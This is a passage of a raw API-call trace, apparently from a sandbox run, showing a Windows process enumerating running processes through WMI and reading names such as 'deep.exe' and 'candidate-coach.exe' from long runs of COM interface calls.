Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0279.171] WbemDefPath:IUnknown:Release (This=0x56fbf88) returned 0x3 [0279.171] CoGetContextToken (in: pToken=0x43db50 | out: pToken=0x43db50) returned 0x0 [0279.171] CoGetContextToken (in: pToken=0x43df64 | out: pToken=0x43df64) returned 0x0 [0279.171] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a9b18, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43dfe4 | out: ppvObject=0x43dfe4*=0x0) returned 0x80004002 [0279.172] WbemDefPath:IUnknown:Release (This=0x5a9b18) returned 0x2 [0279.172] WbemDefPath:IUnknown:Release (This=0x5a9b18) returned 0x1 [0279.172] CoGetContextToken (in: pToken=0x43e8f4 | out: pToken=0x43e8f4) returned 0x0 [0279.172] CoGetContextToken (in: pToken=0x43e854 | out: pToken=0x43e854) returned 0x0 [0279.172] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a9b18, riid=0x43e924*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x43e920 | out: ppvObject=0x43e920*=0x5a9b18) returned 0x0 [0279.172] WbemDefPath:IUnknown:AddRef (This=0x5a9b18) returned 0x3 [0279.172] WbemDefPath:IUnknown:Release (This=0x5a9b18) returned 0x2 [0279.172] WbemDefPath:IWbemPath:SetText (This=0x5a9b18, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2348\"") returned 0x0 [0279.172] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43eaa0 | out: puCount=0x43eaa0*=0x2) returned 0x0 [0279.172] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0x0, pszText=0x0 | out: puBuffLength=0x43ea9c*=0xf, pszText=0x0) returned 0x0 [0279.172] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea9c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.173] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43ea6c | out: puCount=0x43ea6c*=0x2) returned 0x0 [0279.173] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0x0, pszText=0x0 | out: puBuffLength=0x43ea68*=0xf, pszText=0x0) returned 0x0 [0279.173] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea68*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.173] IWbemClassObject:Get (in: This=0x595f90, wszName="Name", lFlags=0, pVal=0x43ea68*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27c217c*=0, plFlavor=0x27c2180*=0 | out: pVal=0x43ea68*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="deep.exe", varVal2=0x0), pType=0x27c217c*=8, plFlavor=0x27c2180*=0) returned 0x0 [0279.173] SysStringByteLen (bstr="deep.exe") returned 0x10 [0279.173] SysStringByteLen (bstr="deep.exe") returned 0x10 [0279.173] IWbemClassObject:Get (in: This=0x595f90, wszName="Name", lFlags=0, pVal=0x43ea70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27c217c*=8, plFlavor=0x27c2180*=0 | out: pVal=0x43ea70*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="deep.exe", varVal2=0x0), pType=0x27c217c*=8, plFlavor=0x27c2180*=0) returned 0x0 [0279.173] SysStringByteLen (bstr="deep.exe") returned 0x10 [0279.173] SysStringByteLen (bstr="deep.exe") returned 0x10 [0279.173] CoTaskMemAlloc (cb=0x4) returned 0x56fbfb8 [0279.173] IEnumWbemClassObject:Next (in: This=0x5115f8, lTimeout=-1, uCount=0x1, apObjects=0x56fbfb8, puReturned=0x27bb39c | out: apObjects=0x56fbfb8*=0x596128, puReturned=0x27bb39c*=0x1) returned 0x0 [0279.174] IUnknown:QueryInterface (in: This=0x596128, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e0cc | out: ppvObject=0x43e0cc*=0x596128) returned 0x0 [0279.174] IUnknown:QueryInterface (in: This=0x596128, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e080 | out: ppvObject=0x43e080*=0x0) returned 0x80004002 [0279.174] IUnknown:QueryInterface (in: This=0x596128, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43dea8 | out: ppvObject=0x43dea8*=0x0) returned 0x80004002 [0279.175] IUnknown:AddRef (This=0x596128) returned 0x3 [0279.175] IUnknown:QueryInterface (in: This=0x596128, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43d9dc | out: ppvObject=0x43d9dc*=0x0) returned 0x80004002 [0279.175] IUnknown:QueryInterface (in: This=0x596128, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43d98c | out: ppvObject=0x43d98c*=0x0) returned 0x80004002 [0279.175] IUnknown:QueryInterface (in: This=0x596128, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43d998 | out: ppvObject=0x43d998*=0x59612c) returned 0x0 [0279.175] IMarshal:GetUnmarshalClass (in: This=0x59612c, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43d9a0 | out: pCid=0x43d9a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0279.175] IUnknown:Release (This=0x59612c) returned 0x3 [0279.175] CoGetContextToken (in: pToken=0x43d9f8 | out: pToken=0x43d9f8) returned 0x0 [0279.175] CoGetContextToken (in: pToken=0x43de0c | out: pToken=0x43de0c) returned 0x0 [0279.175] IUnknown:QueryInterface (in: This=0x596128, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43de8c | out: ppvObject=0x43de8c*=0x0) returned 0x80004002 [0279.175] IUnknown:Release (This=0x596128) returned 0x2 [0279.175] CoGetContextToken (in: pToken=0x43e3f4 | out: pToken=0x43e3f4) returned 0x0 [0279.175] CoGetContextToken (in: pToken=0x43e354 | out: pToken=0x43e354) returned 0x0 [0279.175] IUnknown:QueryInterface (in: This=0x596128, riid=0x43e424*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x43e420 | out: ppvObject=0x43e420*=0x596128) returned 0x0 [0279.175] IUnknown:AddRef (This=0x596128) returned 0x4 [0279.175] IUnknown:Release (This=0x596128) returned 0x3 [0279.175] IUnknown:Release (This=0x596128) returned 0x2 [0279.175] CoTaskMemFree (pv=0x56fbfb8) [0279.176] CoGetContextToken (in: pToken=0x43e764 | out: pToken=0x43e764) returned 0x0 [0279.176] IUnknown:AddRef (This=0x596128) returned 0x3 [0279.176] IWbemClassObject:Get (in: This=0x596128, wszName="__GENUS", lFlags=0, pVal=0x43ea64*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eae4*=0, plFlavor=0x43eae0*=0 | out: pVal=0x43ea64*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x43eae4*=3, plFlavor=0x43eae0*=64) returned 0x0 [0279.176] IWbemClassObject:Get (in: This=0x596128, wszName="__PATH", lFlags=0, pVal=0x43ea48*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eacc*=0, plFlavor=0x43eac8*=0 | out: pVal=0x43ea48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2360\"", varVal2=0x0), pType=0x43eacc*=8, plFlavor=0x43eac8*=64) returned 0x0 [0279.176] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2360\"") returned 0x66 [0279.176] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2360\"") returned 0x66 [0279.176] CoGetObjectContext (in: riid=0x277dff0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43ea74 | out: ppv=0x43ea74*=0x500344) returned 0x0 [0279.176] IComThreadingInfo:GetCurrentApartmentType (in: This=0x500344, pAptType=0x43ea6c | out: pAptType=0x43ea6c*=1) returned 0x0 [0279.176] IUnknown:QueryInterface (in: This=0x500344, riid=0x277dfcc*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x43ea70 | out: ppvObject=0x43ea70*=0x0) returned 0x80004002 [0279.176] IUnknown:Release (This=0x500344) returned 0x1 [0279.177] CoGetClassObject (in: rclsid=0x5aa304*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43e3e0 | out: ppv=0x43e3e0*=0x56fbfb8) returned 0x0 [0279.177] WbemDefPath:IUnknown:QueryInterface (in: This=0x56fbfb8, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43e5f8 | out: ppvObject=0x43e5f8*=0x0) returned 0x80004002 [0279.177] WbemDefPath:IClassFactory:CreateInstance (in: This=0x56fbfb8, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e604 | out: ppvObject=0x43e604*=0x5a9bf8) returned 0x0 [0279.177] WbemDefPath:IUnknown:Release (This=0x56fbfb8) returned 0x0 [0279.177] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a9bf8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e224 | out: ppvObject=0x43e224*=0x5a9bf8) returned 0x0 [0279.178] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a9bf8, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e1d8 | out: ppvObject=0x43e1d8*=0x0) returned 0x80004002 [0279.178] WbemDefPath:IUnknown:AddRef (This=0x5a9bf8) returned 0x3 [0279.178] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a9bf8, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43db34 | out: ppvObject=0x43db34*=0x0) returned 0x80004002 [0279.178] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a9bf8, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43dae4 | out: ppvObject=0x43dae4*=0x0) returned 0x80004002 [0279.178] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a9bf8, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43daf0 | out: ppvObject=0x43daf0*=0x56fbfc8) returned 0x0 [0279.178] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x56fbfc8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43daf8 | out: pCid=0x43daf8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0279.178] WbemDefPath:IUnknown:Release (This=0x56fbfc8) returned 0x3 [0279.178] CoGetContextToken (in: pToken=0x43db50 | out: pToken=0x43db50) returned 0x0 [0279.178] CoGetContextToken (in: pToken=0x43df64 | out: pToken=0x43df64) returned 0x0 [0279.178] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a9bf8, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43dfe4 | out: ppvObject=0x43dfe4*=0x0) returned 0x80004002 [0279.179] WbemDefPath:IUnknown:Release (This=0x5a9bf8) returned 0x2 [0279.179] WbemDefPath:IUnknown:Release (This=0x5a9bf8) returned 0x1 [0279.179] CoGetContextToken (in: pToken=0x43e8f4 | out: pToken=0x43e8f4) returned 0x0 [0279.179] CoGetContextToken (in: pToken=0x43e854 | out: pToken=0x43e854) returned 0x0 [0279.179] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a9bf8, riid=0x43e924*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x43e920 | out: ppvObject=0x43e920*=0x5a9bf8) returned 0x0 [0279.179] WbemDefPath:IUnknown:AddRef (This=0x5a9bf8) returned 0x3 [0279.179] WbemDefPath:IUnknown:Release (This=0x5a9bf8) returned 0x2 [0279.179] WbemDefPath:IWbemPath:SetText (This=0x5a9bf8, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2360\"") returned 0x0 [0279.179] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43eaa0 | out: puCount=0x43eaa0*=0x2) returned 0x0 [0279.179] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0x0, pszText=0x0 | out: puBuffLength=0x43ea9c*=0xf, pszText=0x0) returned 0x0 [0279.179] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea9c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.179] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43ea6c | out: puCount=0x43ea6c*=0x2) returned 0x0 [0279.179] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0x0, pszText=0x0 | out: puBuffLength=0x43ea68*=0xf, pszText=0x0) returned 0x0 [0279.179] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea68*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.179] IWbemClassObject:Get (in: This=0x596128, wszName="Name", lFlags=0, pVal=0x43ea68*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27c29e0*=0, plFlavor=0x27c29e4*=0 | out: pVal=0x43ea68*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="candidate-coach.exe", varVal2=0x0), pType=0x27c29e0*=8, plFlavor=0x27c29e4*=0) returned 0x0 [0279.179] SysStringByteLen (bstr="candidate-coach.exe") returned 0x26 [0279.179] SysStringByteLen (bstr="candidate-coach.exe") returned 0x26 [0279.179] IWbemClassObject:Get (in: This=0x596128, wszName="Name", lFlags=0, pVal=0x43ea70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27c29e0*=8, plFlavor=0x27c29e4*=0 | out: pVal=0x43ea70*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="candidate-coach.exe", varVal2=0x0), pType=0x27c29e0*=8, plFlavor=0x27c29e4*=0) returned 0x0 [0279.180] SysStringByteLen (bstr="candidate-coach.exe") returned 0x26 [0279.180] SysStringByteLen (bstr="candidate-coach.exe") returned 0x26 [0279.180] CoTaskMemAlloc (cb=0x4) returned 0x56fbff8 [0279.180] IEnumWbemClassObject:Next (in: This=0x5115f8, lTimeout=-1, uCount=0x1, apObjects=0x56fbff8, puReturned=0x27bb39c | out: apObjects=0x56fbff8*=0x5962c0, puReturned=0x27bb39c*=0x1) returned 0x0 [0279.204] IUnknown:QueryInterface (in: This=0x5962c0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e0cc | out: ppvObject=0x43e0cc*=0x5962c0) returned 0x0 [0279.204] IUnknown:QueryInterface (in: This=0x5962c0, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e080 | out: ppvObject=0x43e080*=0x0) returned 0x80004002 [0279.204] IUnknown:QueryInterface (in: This=0x5962c0, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43dea8 | out: ppvObject=0x43dea8*=0x0) returned 0x80004002 [0279.205] IUnknown:AddRef (This=0x5962c0) returned 0x3 [0279.205] IUnknown:QueryInterface (in: This=0x5962c0, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43d9dc | out: ppvObject=0x43d9dc*=0x0) returned 0x80004002 [0279.205] IUnknown:QueryInterface (in: This=0x5962c0, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43d98c | out: ppvObject=0x43d98c*=0x0) returned 0x80004002 [0279.205] IUnknown:QueryInterface (in: This=0x5962c0, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43d998 | out: ppvObject=0x43d998*=0x5962c4) returned 0x0 [0279.205] IMarshal:GetUnmarshalClass (in: This=0x5962c4, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43d9a0 | out: pCid=0x43d9a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0279.205] IUnknown:Release (This=0x5962c4) returned 0x3 [0279.205] CoGetContextToken (in: pToken=0x43d9f8 | out: pToken=0x43d9f8) returned 0x0 [0279.205] CoGetContextToken (in: pToken=0x43de0c | out: pToken=0x43de0c) returned 0x0 [0279.205] IUnknown:QueryInterface (in: This=0x5962c0, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43de8c | out: ppvObject=0x43de8c*=0x0) returned 0x80004002 [0279.205] IUnknown:Release (This=0x5962c0) returned 0x2 [0279.205] CoGetContextToken (in: pToken=0x43e3f4 | out: pToken=0x43e3f4) returned 0x0 [0279.205] CoGetContextToken (in: pToken=0x43e354 | out: pToken=0x43e354) returned 0x0 [0279.205] IUnknown:QueryInterface (in: This=0x5962c0, riid=0x43e424*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x43e420 | out: ppvObject=0x43e420*=0x5962c0) returned 0x0 [0279.205] IUnknown:AddRef (This=0x5962c0) returned 0x4 [0279.205] IUnknown:Release (This=0x5962c0) returned 0x3 [0279.205] IUnknown:Release (This=0x5962c0) returned 0x2 [0279.205] CoTaskMemFree (pv=0x56fbff8) [0279.205] CoGetContextToken (in: pToken=0x43e764 | out: pToken=0x43e764) returned 0x0 [0279.205] IUnknown:AddRef (This=0x5962c0) returned 0x3 [0279.205] IWbemClassObject:Get (in: This=0x5962c0, wszName="__GENUS", lFlags=0, pVal=0x43ea64*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eae4*=0, plFlavor=0x43eae0*=0 | out: pVal=0x43ea64*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x43eae4*=3, plFlavor=0x43eae0*=64) returned 0x0 [0279.206] IWbemClassObject:Get (in: This=0x5962c0, wszName="__PATH", lFlags=0, pVal=0x43ea48*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eacc*=0, plFlavor=0x43eac8*=0 | out: pVal=0x43ea48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2372\"", varVal2=0x0), pType=0x43eacc*=8, plFlavor=0x43eac8*=64) returned 0x0 [0279.206] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2372\"") returned 0x66 [0279.206] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2372\"") returned 0x66 [0279.206] CoGetObjectContext (in: riid=0x277dff0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43ea74 | out: ppv=0x43ea74*=0x500344) returned 0x0 [0279.206] IComThreadingInfo:GetCurrentApartmentType (in: This=0x500344, pAptType=0x43ea6c | out: pAptType=0x43ea6c*=1) returned 0x0 [0279.206] IUnknown:QueryInterface (in: This=0x500344, riid=0x277dfcc*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x43ea70 | out: ppvObject=0x43ea70*=0x0) returned 0x80004002 [0279.206] IUnknown:Release (This=0x500344) returned 0x1 [0279.207] CoGetClassObject (in: rclsid=0x5aa304*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43e3e0 | out: ppv=0x43e3e0*=0x56fbff8) returned 0x0 [0279.207] WbemDefPath:IUnknown:QueryInterface (in: This=0x56fbff8, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43e5f8 | out: ppvObject=0x43e5f8*=0x0) returned 0x80004002 [0279.207] WbemDefPath:IClassFactory:CreateInstance (in: This=0x56fbff8, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e604 | out: ppvObject=0x43e604*=0x5a9cd8) returned 0x0 [0279.207] WbemDefPath:IUnknown:Release (This=0x56fbff8) returned 0x0 [0279.207] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a9cd8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e224 | out: ppvObject=0x43e224*=0x5a9cd8) returned 0x0 [0279.207] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a9cd8, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e1d8 | out: ppvObject=0x43e1d8*=0x0) returned 0x80004002 [0279.208] WbemDefPath:IUnknown:AddRef (This=0x5a9cd8) returned 0x3 [0279.208] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a9cd8, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43db34 | out: ppvObject=0x43db34*=0x0) returned 